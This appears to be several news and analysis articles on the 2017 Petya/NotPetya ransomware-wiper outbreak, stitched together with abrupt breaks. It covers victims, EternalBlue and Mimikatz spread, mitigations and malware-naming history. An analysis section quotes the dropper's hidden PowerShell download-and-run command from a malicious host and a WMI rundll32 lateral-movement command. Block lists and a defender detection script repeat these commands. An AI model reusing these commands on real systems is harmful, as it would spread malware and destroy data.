Malware “Petya” and “Misha”: what is happening and what to do, in three words?
Who is behind the massive infection in Ukraine?
Check for the possible presence of residual components of the Petya and Mischa ransomware.

On Tuesday, June 27, Ukrainian and Russian companies reported a massive virus attack: computers at enterprises displayed a ransom message. I figured out who once again suffered because of hackers and how to protect yourself from theft of important data.

Petya, that's enough

The energy sector was the first to be attacked: Ukrainian companies Ukrenergo and Kyivenergo complained about the virus. The attackers paralyzed their computer systems, but this did not affect the stability of the power plants.

Ukrainians began to publish the consequences of the infection online: judging by numerous pictures, computers were attacked by a ransomware virus. A message popped up on the screen of the affected devices stating that all data was encrypted and device owners needed to pay a $300 ransom in Bitcoin. However, the hackers did not say what would happen to the information in case of inaction, and did not even set a countdown timer until the data was destroyed, as was the case with the WannaCry virus attack.

The National Bank of Ukraine (NBU) reported that the work of several banks was partially paralyzed due to the virus. According to Ukrainian media, the attack affected the offices of Oschadbank, Ukrsotsbank, Ukrgasbank, and PrivatBank.

The computer networks of Ukrtelecom, Boryspil Airport, Ukrposhta, Nova Poshta, Kievvodokanal and the Kyiv Metro were infected. In addition, the virus hit Ukrainian mobile operators - Kyivstar, Vodafone and Lifecell.

Later, Ukrainian media clarified that the malware in question is Petya.A. It is distributed in the way usual for such attacks: victims receive phishing e-mails from fake senders asking them to open an attached link. Once the attachment is opened, the virus penetrates the computer, encrypts the files and demands a ransom to decrypt them.

The hackers indicated the number of their Bitcoin wallet to which the money should be transferred. Judging by the transaction information, the victims have already transferred 1.2 bitcoins (more than 168 thousand rubles).

According to information security specialists from Group-IB, more than 80 companies were affected by the attack. The head of their crime lab noted that the virus is not related to WannaCry. To fix the problem, he advised closing TCP ports 1024–1035, 135 and 445.

Who is to blame

She hastened to assume that the attack was organized from the territory of Russia or Donbass, but did not provide any evidence. The Minister of Infrastructure of Ukraine saw a clue in the word “virus” and wrote on his Facebook page that “it’s no coincidence that it ends in RUS,” adding a winking emoticon to his guess.

Meanwhile, he claims that the attack is in no way connected with the existing malware known as Petya and Mischa. Security experts say that the new wave has affected not only Ukrainian and Russian companies, but also enterprises in other countries.

However, the interface of the current “malware” resembles the well-known Petya virus, which was distributed through phishing links a few years ago. At the end of December, an unknown hacker responsible for creating the Petya and Mischa ransomware began sending infected emails with an attached virus called GoldenEye, which was identical to previous versions of the ransomware.

The attachment to the regular letter, which HR department employees often received, contained information about the fake candidate. In one of the files one could actually find a resume, and in the next one - the virus installer. Then the main targets of the attacker were companies in Germany. Over the course of 24 hours, more than 160 employees of the German company fell into the trap.

It was not possible to identify the hacker, but he is obviously a Bond fan. Petya and Mischa are named after the Russian satellites “Petya” and “Misha” from the film “GoldenEye”, which in the plot were electromagnetic weapons.

The original version of Petya began to be actively distributed in April 2016. It skillfully camouflaged itself on computers and posed as legitimate programs, requesting extended administrator rights. After activation, the program behaved extremely aggressively: it set a strict deadline for paying the ransom, demanding 1.3 bitcoins, and after the deadline, it doubled the monetary compensation.

However, then one of the Twitter users quickly found the weaknesses of the ransomware and created a simple program that, in seven seconds, generated a key that allowed you to unlock the computer and decrypt all the data without any consequences.

Not for the first time

In mid-May, computers around the world were attacked by a similar ransomware virus, WannaCrypt0r 2.0, also known as WannaCry. In just a few hours, it paralyzed hundreds of thousands of Windows devices in more than 70 countries. Among the victims were Russian security forces, banks and mobile operators. Once on the victim’s computer, the virus encrypted the hard drive and demanded that the victim send the attackers $300 in bitcoin. Three days were allotted for reflection, after which the amount was doubled, and after a week the files would remain encrypted forever.

However, the victims were in no hurry to pay the ransom, and the creators of the malware

Image caption: According to experts, fighting the new ransomware is more difficult than WannaCry.

On June 27, ransomware locked computers and encrypted files at dozens of companies around the world.

It is reported that Ukrainian companies suffered the most - the virus infected the computers of large companies, government agencies and infrastructure facilities.

The virus demands $300 in Bitcoin from victims to decrypt files.

The BBC Russian service answers the main questions about the new threat.

Who was hurt?

The spread of the virus began in Ukraine. The Boryspil airport, some regional divisions of Ukrenergo, chain stores, banks, media and telecommunications companies were affected. Computers in the Ukrainian government also went down.

Following this, it was the turn of companies in Russia: Rosneft, Bashneft, Mondelez International, Mars, Nivea and others also became victims of the virus.

How does the virus work?

Experts have not yet reached a consensus on the origin of the new virus. Group-IB and Positive Technologies see it as a variant of the 2016 Petya virus.

“This ransomware uses both hacker methods and utilities and standard system administration utilities,” comments Elmar Nabigaev, head of the information security threat response department at Positive Technologies. “All this guarantees a high speed of spread within the network and the massiveness of the epidemic as a whole (once at least one personal computer is infected). The result is complete computer inoperability and data encryption.”

The Romanian company Bitdefender sees more in common with the GoldenEye virus, in which Petya is combined with another piece of malware called Misha. The advantage of the latter is that it does not require administrator rights from the future victim in order to encrypt files, but obtains them on its own.

Brian Cambell from Fujitsu and a number of other experts believe that the new virus uses a modified EternalBlue program stolen from the US National Security Agency.

After the publication of this program by hackers The Shadow Brokers in April 2017, the WannaCry ransomware virus created on its basis spread all over the world.

Using Windows vulnerabilities, this program allows the virus to spread to computers throughout the corporate network. The original Petya was sent by email under the guise of a resume and could only infect the computer where the resume was opened.

Kaspersky Lab told Interfax that the ransomware virus does not belong to previously known families of malicious software.

“Kaspersky Lab software products detect this malware as UDS:DangerousObject.Multi.Generic,” noted Vyacheslav Zakorzhevsky, head of the anti-virus research department at Kaspersky Lab.

In general, whatever the new virus is called in Russian, keep in mind that in appearance it looks more like Frankenstein’s monster, since it is assembled from several malicious programs. It is known for certain that the virus was born on June 18, 2017.

Image caption: The virus demands $300 to decrypt files and unlock your computer.

Cooler than WannaCry?

It took WannaCry just a few days in May 2017 to become the largest cyberattack of its kind in history. Will the new ransomware virus surpass its recent predecessor?

In less than a day, the attackers received 2.1 bitcoins from their victims - about 5 thousand dollars. WannaCry collected 7 bitcoins during the same period.

At the same time, according to Elmar Nabigaev from Positive Technologies, it is more difficult to fight the new ransomware.

“In addition to exploiting [the Windows vulnerability], this threat is also spread through operating system accounts stolen using special hacking tools,” the expert noted.

How to fight the virus?

As a preventative measure, experts advise installing updates for operating systems on time and checking files received by email.

Advanced administrators are advised to temporarily disable the Server Message Block (SMB) network transfer protocol.

If your computers are infected, under no circumstances should you pay the attackers. There is no guarantee that once they receive payment, they will decrypt the files rather than demand more.

All that remains is to wait for a decryption program: in the case of WannaCry, it took Adrien Guinet, a specialist from the French company Quarkslab, a week to create one.

The first ransomware, AIDS (PC Cyborg), was written by biologist Joseph Popp in 1989. It hid directories and encrypted files, demanding a payment of $189 for a “license renewal” to an account in Panama. Popp distributed his brainchild on floppy disks sent by regular mail, making about 20 thousand shipments in total. Popp was detained while trying to cash a check, but avoided trial: in 1991 he was declared insane.

There is a new ransomware virus epidemic on the Internet. The malware practically blocked the work of dozens of large companies, demanding just under $400 for decrypting the hard drive of each workstation.

The panic generated by the new epidemic created information chaos: first, anti-virus analysts announced the second coming of WannaCry, then the malware was identified as a complex of newly assembled encryption viruses “Petya” and “Misha”. At this point, it is clear that if the virus was based on Petya, it was heavily modified.

The distribution model is partly similar to WannaCry: an exploit for the MS17-010 vulnerability is used, supplemented by social engineering that relies on a vulnerability in MS Word. Infection occurs after a user opens an e-mail attachment or downloads a file that exploits the CVE-2017-0199 vulnerability published in April 2017. Distribution to other computers on the network is then ensured by a whole set of techniques:

  • stealing user passwords or reusing active sessions to access other network nodes (modified Mimikatz utility code is used);
  • a vulnerability in SMB (CVE-2017-0144, MS17-010), exploited with the same notorious EternalBlue exploit that WannaCry used successfully.

The malware uses stolen accounts to copy its body into admin$ shares and launches them using the legitimate PsExec utility, which is used to remotely control a computer.

The developer of the well-known Mimikatz program confirmed that modified code from it is used to extract passwords.



Code for using the WMI interface to run the installation was also published on the Microsoft blog.

Infection via the SMB vector uses the CVE-2017-0144 vulnerability, similar to the technique used in WannaCry.

But the encryption model has changed significantly compared to WannaCry. Once on the computer, the virus infects the MBR (master boot record) of the system and encrypts the first few blocks of the hard drive, including the Master File Table, making the user's entire hard drive inaccessible rather than just individual files, as ransomware usually does.

It’s definitely not worth paying a ransom to extortionists, and not only for ethical reasons: virus analysts have come to the conclusion that decrypting files after paying a ransom is in principle impossible. This function is simply not included in the malware. In fact, this is not an epidemic of ransomware, but an epidemic of a wiper virus that destroys data.

According to media reports in Russia, the greatest problems were encountered in the Rosneft corporation; the main websites of the corporation and the Bashneft website were disabled for a long time.

Massive infections have been recorded in France, Spain, Russia, and CIS countries. In Ukraine, dozens of government and commercial organizations have been affected by the virus.

Who needs this?

Since no recovery mechanism was included in the code, there are three possible motives for the attackers. Either they wanted to disguise the targeted destruction of someone’s specific data as a mass epidemic, or they wanted to make money without ever intending to restore anything. The least likely option is cyber vandalism: a virus like this is a serious product, and it would make more sense to spend the effort of creating it on something that brings in money. Vandals were common in the 1990s, when it was fashionable to break systems for fame, but they are now extremely rare.

As a result, the main beneficiaries of the epidemics of the last two months appear to be The Shadow Brokers group, which distributed the EternalBlue exploit. The extortionists themselves collected relatively small sums, several orders of magnitude less than the damage caused by the epidemic. The epidemics have become excellent advertising for The Shadow Brokers, who claim to be ready to sell information about other exploits from the NSA archive. After all, EternalBlue is just one of dozens of exploits stolen from the agency in August 2016.

Attack Mechanism

An attacker can send files or links to them (at the initial stage of the epidemic these were the files Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc), through which a workstation running Windows is infected. For example, when the file Order-[any date].doc is opened, the server 84.200.16.242 is contacted on port 80 and an xls is downloaded:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [process id], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

The malware then tries to connect to servers 111.90.139.247:80 and COFFEINOFFICE.XYZ:80, which are possibly command and control servers.

Indicators of compromise are the presence of files:

C:\Windows\perfc.dat
C:\myguy.xls.hta

After gaining a foothold on the host, it scans other Windows machines on the network and spreads using the vulnerabilities described in MS17-010 (the same ones WannaCry used) on ports tcp:135, tcp:139, tcp:445 and tcp:1024-1035.

Distribution can also occur by executing the command:

Remote WMI, “process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"


The infection spread diagram is taken from blog.kryptoslogic.com

How to avoid infection?

1. Block connections to the following addresses:

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

2. Block the following files (e-mail attachments and downloads):

Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc

3. Install patches

4. Configure IPS to block exploits for MS17-010

5. To protect hosts that have not yet been infected, create a file c:\windows\perfc with no extension. Such hosts are not infected.
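A defender-side triage script, added here as an example (not code from any of the articles on this page): it runs detection rules for the command lines described above (rundll32 loading perfc.dat by ordinal #1 via WMI or PsExec, the hidden PowerShell download, the listed C2 hosts) over a constructed process-creation log, and checks a drive root for the two IoC files and for the c:\windows\perfc kill-switch from item 5. The log format, host names and rule names are assumptions of this example.

```python
"""Triage helpers for the June 2017 Petya/NotPetya indicators listed in this article.

Added example (not code from any of the original articles): runs detection rules
for the command lines described above against a constructed process-creation
log, and checks a drive root for the IoC files and the c:\\windows\\perfc
kill-switch from item 5.  Log format, host names and rule names are assumed.
"""
import os
import re
import stat

# Network and file indicators quoted in the article.
C2_HOSTS = {"french-cooking.com", "84.200.16.242", "111.90.139.247", "coffeinoffice.xyz"}
IOC_FILES = [("Windows", "perfc.dat"), ("myguy.xls.hta",)]  # relative to the drive root
KILLSWITCH = ("Windows", "perfc")                            # extension-less, item 5

# Detection rules, applied to the lower-cased command line.
RULES = [
    # rundll32 loading perfc.dat by export ordinal #1 (WMI form quoted above;
    # the PsExec form "perfc.dat,#1" also matches)
    ("perfc_rundll32", re.compile(r"rundll32(?:\.exe)?\s+.*perfc\.dat.{0,4}#1")),
    # WMI remote execution: "process call create"
    ("wmi_process_create", re.compile(r"process\s+call\s+create")),
    # PsExec launch, or a copy into a remote admin$ share
    ("psexec_or_admin_share", re.compile(r"psexec|\\\\[^\\\s]+\\admin\$")),
    # hidden PowerShell download of the dropper into %APPDATA%
    ("powershell_download", re.compile(r"powershell.*-windowstyle\s+hidden.*downloadfile")),
]


def classify(cmdline):
    """Return the names of all matching rules, plus 'c2:<host>' for any listed C2 host."""
    low = cmdline.lower()
    hits = [name for name, rx in RULES if rx.search(low)]
    hits += sorted("c2:" + h for h in C2_HOSTS if h in low)
    return hits


def scan_log(lines):
    """Parse 'key=value' process-creation records (constructed format).

    Returns (host, hits) for every record matching at least one rule."""
    findings = []
    for line in lines:
        host = re.search(r"\bhost=(\S+)", line)
        parts = line.split("cmd=", 1)
        if not host or len(parts) < 2:
            continue                       # malformed record: skip, do not crash
        hits = classify(parts[1])
        if hits:
            findings.append((host.group(1), hits))
    return findings


def host_status(root):
    """Check a drive root ('C:\\' on a live host, or a mounted image) for IoC files and kill-switch."""
    present = [os.path.join(*p) for p in IOC_FILES if os.path.isfile(os.path.join(root, *p))]
    return {"iocs_present": present,
            "killswitch_present": os.path.isfile(os.path.join(root, *KILLSWITCH))}


def create_killswitch(root):
    """Create the extension-less perfc file, read-only, if missing (needs admin rights on C:\\Windows)."""
    path = os.path.join(root, *KILLSWITCH)
    if not os.path.exists(path):
        open(path, "wb").close()
        os.chmod(path, stat.S_IREAD)       # read-only so the dropper cannot overwrite it
    return path


# Constructed sample telemetry; hosts, parent processes and paths are invented.
SAMPLE_LOG = [
    'host=WS01 parent=WINWORD.EXE cmd=powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("http://french-cooking.com/myguy.exe", "%APPDATA%\\10807.exe")',
    'host=WS01 parent=10807.exe cmd=wmic.exe /node:WS02 process call create "C:\\Windows\\System32\\rundll32.exe \\"C:\\Windows\\perfc.dat\\" #1"',
    'host=WS02 parent=WmiPrvSE.exe cmd=C:\\Windows\\System32\\rundll32.exe "C:\\Windows\\perfc.dat" #1',
    'host=WS01 parent=10807.exe cmd=psexec.exe \\\\WS03 -s -d C:\\Windows\\System32\\rundll32.exe C:\\Windows\\perfc.dat,#1',
    'host=WS04 parent=explorer.exe cmd=notepad.exe C:\\Users\\alice\\notes.txt',
]

if __name__ == "__main__":
    for host, hits in scan_log(SAMPLE_LOG):
        print(host, ", ".join(hits))
```

Point `host_status` at a mounted disk image to triage a host offline; the perfc rule alone has no benign match on a normal workstation, so it is the highest-confidence signal here.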

A brief excursion into the history of malware naming.

Petya.A virus logo

On June 27, at least 80 Russian and Ukrainian companies were attacked by the Petya.A virus. The program blocked information on the computers of departments and enterprises and, like the well-known ransomware virus, demanded bitcoins from users.

Malicious programs are usually named by employees of antivirus companies. The exceptions are those encryptors, ransomware, destroyers and identity thieves, which, in addition to computer infections, cause media epidemics - increased hype in the media and active discussion on the network.

However, the Petya.A virus represents a new generation. The name by which it introduces itself is part of the developers’ marketing strategy, aimed at increasing its recognition and popularity on the darknet market.

Subcultural phenomenon

At a time when there were few computers and not all of them were connected to each other, self-propagating programs (not yet called viruses) already existed. One of the first of these was , which jokingly greeted the user and invited them to catch and delete it. Next up was Cookie Monster, which demanded to be “given a cookie” by typing the word “cookie.”

Early malware also had a sense of humor, although it was not always in the names. Thus, Richard Skrenta’s program for the Apple II read a poem to the victim once every 50 startups, and virus names, often hidden in the code and never displayed, referred to jokes and subcultural words common among the geeks of that time: metal band names, popular literature and tabletop role-playing games.

At the end of the 20th century, virus creators did not hide much; moreover, when a program got out of control, they often tried to help eliminate the harm it had caused. This was the case with the Pakistani and with the destructive one created by the future co-founder of the Y Combinator business incubator.

One of the Russian viruses mentioned by Evgeniy Kaspersky in his 1992 book “Computer Viruses in MS-DOS” also demonstrated poetic abilities. The Condom-1581 program from time to time showed the victim a poem dedicated to the problem of the world's oceans being clogged with human waste.

Geography and calendar

In 1987, the Jerusalem virus, also known as the Israeli Virus, was named after the place where it was first discovered, and its alternative name Black Friday was due to the fact that it would activate and delete executable files if the 13th of the month fell on a Friday.

The Michelangelo virus, which caused panic in the media in the spring of 1992, was also named according to the calendar principle. Then John McAfee, later famous for creating one of the most intrusive antiviruses, during a Sydney cybersecurity conference, told journalists and the public: “If you boot an infected system on March 6, all the data on the hard drive will be corrupted.” What does Michelangelo have to do with this? March 6 was the Italian artist’s birthday. However, the horrors that McAfee predicted ended up being wildly exaggerated.

Functionality

The capabilities of a virus and its specific features often serve as the basis for its name. In 1990, one of the first polymorphic viruses was named Chameleon, and a virus with extensive capabilities to hide its presence (and therefore classed as a stealth virus) was named Frodo, a nod to the hero of “The Lord of the Rings” and the Ring that hides its bearer from others’ eyes. And the OneHalf virus of 1994, for example, got its name because it infected only half of the disk of the attacked device.

Service titles

Most viruses have long been named in laboratories, where they are analyzed into parts by analysts.

Usually these are boring serial names and general “family” names that describe the category of the virus, what systems it attacks and what it does with them (like Win32.HLLP.DeTroie). However, sometimes, when hints left by the developers are revealed in the program code, viruses gain a little personality. This is how, for example, the MyDoom and KooKoo viruses appeared.

However, this rule does not always work - for example, the Stuxnet virus, which stopped uranium enrichment centrifuges in Iran, was not called Myrtus, although this word (“myrtle”) in the code was almost a direct hint at the participation of Israeli intelligence services in its development. In this case, the name that had already become known to the general public, assigned to the virus in the first stages of its discovery, won.

Tasks

It often happens that viruses requiring a great deal of attention and effort to study receive attractive names from antivirus companies, names that are easier to say and write down. This happened with Red October (diplomatic correspondence and data that could affect international relations) and with IceFog (large-scale industrial espionage).

File extension

Another popular way of naming is by the extension that the virus assigns to infected files. Thus, one of the “military” viruses, Duqu, was named so not because of Count Dooku from Star Wars, but because of the ~DQ prefix, which marked the files it created.

The WannaCry virus, which made a splash this spring, also got its name, marking the data encrypted by it with the .wncry extension.

The earlier name of the virus, Wanna Decrypt0r, did not catch on: it sounded worse and had different spellings. Not everyone bothered to type a “0” instead of an “o”.

“You have become a victim of the Petya ransomware virus”

This is exactly how the most talked-about malware today introduces itself after it has finished encrypting files on the attacked computer. The Petya.A virus not only has a recognizable name, but also a logo in the form of a pirate skull and crossbones, and a whole marketing campaign. Spotted together with its brother “Misha”, the virus attracted the attention of analysts precisely because of this.

From a subcultural phenomenon, having passed through a period when this kind of “hacking” required quite serious technical knowledge, viruses have turned into a weapon of cyber-mugging. Now they have to play by market rules, and whoever gets more attention brings bigger profits to their developers.
